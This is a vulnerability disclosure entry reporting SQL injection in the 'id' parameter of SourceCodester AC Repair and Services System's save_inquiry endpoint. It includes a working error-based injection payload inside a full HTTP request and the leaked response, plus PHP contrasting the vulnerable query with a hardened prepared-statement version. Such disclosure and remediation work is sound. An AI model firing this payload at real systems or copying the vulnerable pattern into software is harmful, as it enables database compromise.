| Title | SourceCodester AC Repair and Services System sql injection |
|---|
| Description | I have discovered a SQL injection vulnerability in the SourceCodester AC Repair and Services System (https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html). This affects the file /classes/Master.php?f=save_inquiry:

```http
POST /php-acrss/classes/Master.php?f=save_inquiry HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------2854294418240524322736048278
Content-Length: 913
Origin: http://localhost
Connection: close
Referer: http://localhost/php-acrss/admin/?page=bookings/manage_booking
Cookie: PHPSESSID=avms7d982mr3recfih6r7sfun0
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------2854294418240524322736048278
Content-Disposition: form-data; name="id"

1' or (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
-----------------------------2854294418240524322736048278
Content-Disposition: form-data; name="fullname"

111
-----------------------------2854294418240524322736048278
Content-Disposition: form-data; name="email"

[email protected]
-----------------------------2854294418240524322736048278
Content-Disposition: form-data; name="contact"

111
-----------------------------2854294418240524322736048278
Content-Disposition: form-data; name="address"

111
-----------------------------2854294418240524322736048278
Content-Disposition: form-data; name="services[]"

1
-----------------------------2854294418240524322736048278
Content-Disposition: form-data; name="status"

0
-----------------------------2854294418240524322736048278--
```

And it returns `{"status":"failed","err":"XPATH syntax error: '~admin@localhost~'[UPDATE `inquiry_list` set `fullname`='111' , `email`='[email protected]' , `contact`='111' , `address`='111' , `services`='' , `status`='0' where id = '1' or (extractvalue(1,concat(0x7e,(select user()),0x7e)))#' ]"}`. This proves that there is an error injection vulnerability here.

The vulnerability exists because they all used the code `sql = "UPDATE inquiry_list set {data} where id = '{$id}' ";` without sufficient filtering on the controllable parameter id. This lack of filtering makes it possible for SQL injection attacks to occur. My suggestion for fixing this issue is to protect the id parameter from malicious exploitation by using `mysqli_real_escape_string()`. |
|---|
| Source | https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html |
|---|
| User | NNanfeng (UID 27153) |
|---|
| Submission | 07/13/2023 11:40 (3 years ago) |
|---|
| Moderation | 07/13/2023 11:54 (14 minutes later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 234015 [SourceCodester AC Repair and Services System 1.0 Master.php?f=save_inquiry ID sql injection] |
|---|
| Points | 20 |
|---|
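The following is an added example, not code from the project or from the submission above. It places the `id`-interpolation pattern quoted in the Description next to a hardened `save_inquiry` handler, and also shows the submitter's own `mysqli_real_escape_string()` suggestion as a minimal change. It assumes an open mysqli connection in `$conn`, the `inquiry_list` columns that appear in the response above, and that `services[]` is stored as a comma-separated string; the function names are hypothetical.

```php
<?php
// Added example, not the project's own code. Assumes an open mysqli
// connection in $conn and the `inquiry_list` columns visible in the report's
// response (fullname, email, contact, address, services, status, id).
// Function names are hypothetical.

// 1. The pattern the report quotes: $id goes straight from the request into the
//    SQL text, and the raw database error is echoed back in the JSON response.
//    How the other columns are assembled is not part of the report; only the
//    status column is shown here so the query is valid.
function save_inquiry_vulnerable(mysqli $conn, array $post): array
{
    $id   = $post['id'];
    $data = "`status`='" . $conn->real_escape_string((string) $post['status']) . "'";
    $sql  = "UPDATE inquiry_list set {$data} where id = '{$id}' ";   // id unfiltered
    if ($conn->query($sql) === false) {
        // Returning $conn->error to the client is what turns a syntax error
        // into an information leak (the response in the report shows exactly this).
        return ['status' => 'failed', 'err' => $conn->error . '[' . $sql . ']'];
    }
    return ['status' => 'success'];
}

// 2. Hardened handler: the id is validated as an integer before it reaches the
//    query, every value is bound as a parameter instead of interpolated, column
//    names come only from a fixed whitelist, and the client sees a generic error
//    while the real one is logged server-side.
function save_inquiry_hardened(mysqli $conn, array $post): array
{
    $id = $post['id'] ?? '';
    if (!ctype_digit((string) $id)) {
        return ['status' => 'failed', 'err' => 'invalid id'];
    }

    $columns = ['fullname', 'email', 'contact', 'address', 'status'];
    $set     = [];
    $values  = [];
    foreach ($columns as $col) {
        $set[]    = "`{$col}` = ?";
        $values[] = (string) ($post[$col] ?? '');
    }
    // services[] arrives as an array; stored comma-separated here (assumption).
    $set[]    = "`services` = ?";
    $values[] = implode(',', array_map('strval', (array) ($post['services'] ?? [])));
    $values[] = (int) $id;   // bound last, matching the WHERE placeholder

    $sql  = 'UPDATE `inquiry_list` SET ' . implode(', ', $set) . ' WHERE `id` = ?';
    $stmt = $conn->prepare($sql);
    if ($stmt === false) {
        error_log('save_inquiry prepare failed: ' . $conn->error);
        return ['status' => 'failed', 'err' => 'database error'];
    }
    $types = str_repeat('s', count($values) - 1) . 'i';
    $stmt->bind_param($types, ...$values);
    $ok = $stmt->execute();
    if (!$ok) {
        error_log('save_inquiry execute failed: ' . $stmt->error);
    }
    $stmt->close();
    return $ok ? ['status' => 'success'] : ['status' => 'failed', 'err' => 'database error'];
}

// 3. The submitter's suggestion as a one-line change to the quoted query:
//    escaping closes the quoted-string break-out, but it relies on the value
//    staying inside quotes in the SQL; parameter binding above does not.
function build_update_with_escaped_id(mysqli $conn, string $data, string $id): string
{
    return "UPDATE inquiry_list set {$data} where id = '" . $conn->real_escape_string($id) . "'";
}

// Usage (assumes $conn = new mysqli(...) is created by the including file):
// header('Content-Type: application/json');
// echo json_encode(save_inquiry_hardened($conn, $_POST));
```

With the hardened handler, the payload from the report fails the `ctype_digit` check before any SQL is built, and even an integer-looking value is bound as a parameter, so the query text never depends on request content; the generic error message also removes the channel the `XPATH syntax error` response provided.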